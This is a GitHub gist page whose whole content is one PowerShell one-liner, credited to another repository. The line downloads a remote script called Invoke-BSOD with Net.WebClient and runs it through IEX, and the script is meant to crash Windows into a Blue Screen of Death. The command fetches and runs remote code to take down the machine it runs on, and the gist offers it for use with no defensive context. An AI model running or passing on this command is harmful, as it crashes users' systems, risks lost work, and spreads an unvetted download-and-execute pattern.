Skip to content

Instantly share code, notes, and snippets.

@JonnyBanana
Created April 8, 2018 20:44
Show Gist options
  • Save JonnyBanana/656339a0495c3fb195a93a20b090eb77 to your computer and use it in GitHub Desktop.
Save JonnyBanana/656339a0495c3fb195a93a20b090eb77 to your computer and use it in GitHub Desktop.
invoke BSOD "the Blue Screen of Death" from Windows PowerShell
*NOTE - invoke BSOD "the Blue Screen of Death" i have take this script from here: https://github.com/peewpw/Invoke-BSOD*
PS>IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment